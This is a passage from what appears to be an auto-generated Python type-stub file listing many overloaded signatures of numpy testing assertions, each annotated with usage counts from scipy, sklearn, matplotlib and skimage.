...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.float64, err_msg: str):
"""
usage.scipy: 1
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(0)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.float64, err_msg: Literal["orth.chebyu(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(0)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(1)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(1)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(2)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(2)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(3)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(3)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(4)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(4)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[float], decimal: int, err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, decimal: int, err_msg: str
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["alpha - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: List[numpy.float64], decimal: int, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["argus - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["beta - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[numpy.float64], decimal: int, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["burr - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["chi - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["chi2 - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["expon - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[float],
decimal: int,
err_msg: Literal["f - sf-isf roundtrip"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["f - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["fisk - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["gamma - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["levy - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["lomax - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["moyal - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["ncf - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["nct - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["ncx2 - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["norm - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["rdist - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["rice - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[float],
decimal: int,
err_msg: Literal["t - sf-isf roundtrip"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["t - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["trapz - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["wald - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["binom - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["binom - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["binom - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["boltzmann - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float, desired: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["dlaplace - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["geom - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["geom - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["geom - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["nbinom - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["nbinom - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["nbinom - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["planck - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["planck - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["planck - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["poisson - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["poisson - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["randint - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["randint - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[float],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["quadrature"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["zolotarev"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[int, float, float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[int, float, int, int],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: int, decimal: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: float,
decimal: int,
err_msg: Literal["test_540_567"],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[float, float],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, int]],
decimal: int,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(actual: int, desired: numpy.float64, decimal: int):
"""
usage.scipy: 3
usage.sklearn: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.ma.core.MaskedArray, desired: List[List[float]], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ma.core.MaskedArray, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ma.core.MaskedArray, desired: List[float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.ma.core.MaskedArray, desired: List[float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ma.core.MaskedArray, desired: numpy.ma.core.MaskedArray
):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, verbose: bool
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: float, decimal: int, verbose: bool):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: scipy.stats.stats.SpearmanrResult,
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: scipy.stats.stats.SpearmanrResult,
desired: scipy.stats.mstats_basic.SpearmanrResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: List[float], desired: List[float], decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: List[Union[numpy.float64, float]], desired: List[float], decimal: int
):
"""
usage.scipy: 8
"""
...
@overload
def assert_almost_equal(
actual: List[numpy.float64], desired: List[float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: List[numpy.float64], desired: numpy.ndarray, decimal: int
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: scipy.stats.mstats_basic.KruskalResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: List[numpy.float64], desired: numpy.ndarray):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_almost_equal(actual: list, desired: numpy.ndarray):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_almost_equal(actual: Tuple[float, float], desired: Tuple[int, int]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_almost_equal(actual: List[numpy.float64], desired: List[float]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_almost_equal(actual: List[float], desired: numpy.ndarray):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["Unexpected std"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: float, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: int, desired: numpy.float64):
"""
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: numpy.int64, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: str):
"""
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(actual: float, desired: float, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[float, int]]):
"""
usage.sklearn: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[int], err_msg: str):
"""
usage.sklearn: 3
"""
...
def assert_almost_equal(
actual: object,
desired: object,
decimal: int = ...,
verbose: bool = ...,
err_msg: str = ...,
):
"""
usage.matplotlib: 50
usage.scipy: 1344
usage.skimage: 333
usage.sklearn: 965
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: float, significant: int):
"""
usage.scipy: 61
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: float):
"""
usage.matplotlib: 1
usage.scipy: 87
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: numpy.float64):
"""
usage.scipy: 10
usage.sklearn: 1
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64, desired: numpy.float64, significant: int
):
"""
usage.scipy: 13
usage.sklearn: 1
"""
...
@overload
def assert_approx_equal(actual: float, desired: float):
"""
usage.scipy: 25
"""
...
@overload
def assert_approx_equal(actual: float, desired: float, significant: int):
"""
usage.scipy: 6
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.100000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.125000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.150000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.175000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.200000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.450000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.500000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.550000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.600000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.650000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.850000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.875000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.900000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.925000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.950000"],
):
"""
usage.scipy: 2
"""
...
def assert_approx_equal(
actual: Union[numpy.float64, float],
desired: Union[numpy.float64, int, float],
significant: int = ...,
err_msg: str = ...,
):
"""
usage.matplotlib: 1
usage.scipy: 220
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Tuple[int, int, int]]]):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.matplotlib: 29
usage.scipy: 1966
usage.skimage: 39
usage.sklearn: 886
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: Tuple[int, int, int]):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[int]):
"""
usage.matplotlib: 2
usage.scipy: 188
usage.skimage: 6
usage.sklearn: 61
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[int, float]]):
"""
usage.matplotlib: 1
usage.scipy: 3
usage.skimage: 3
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[float]):
"""
usage.scipy: 105
usage.skimage: 1
usage.sklearn: 67
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Tuple[int, int]]):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int], y: Tuple[int, int, int, int]
):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: Tuple[int, int, int, int, int, int]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_almost_equal(x: int, y: int):
"""
usage.scipy: 2
usage.skimage: 1
usage.sklearn: 7
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: Tuple[float, float]
):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64], y: Tuple[float, float, float]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: int):
"""
usage.scipy: 50
usage.skimage: 5
usage.sklearn: 14
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray, decimal: int):
"""
usage.matplotlib: 4
usage.scipy: 249
usage.sklearn: 226
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=1"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=51"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=111"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=100"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=200"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=64"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=128"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=256"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=1024"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 2 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 3 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 4 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 8 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
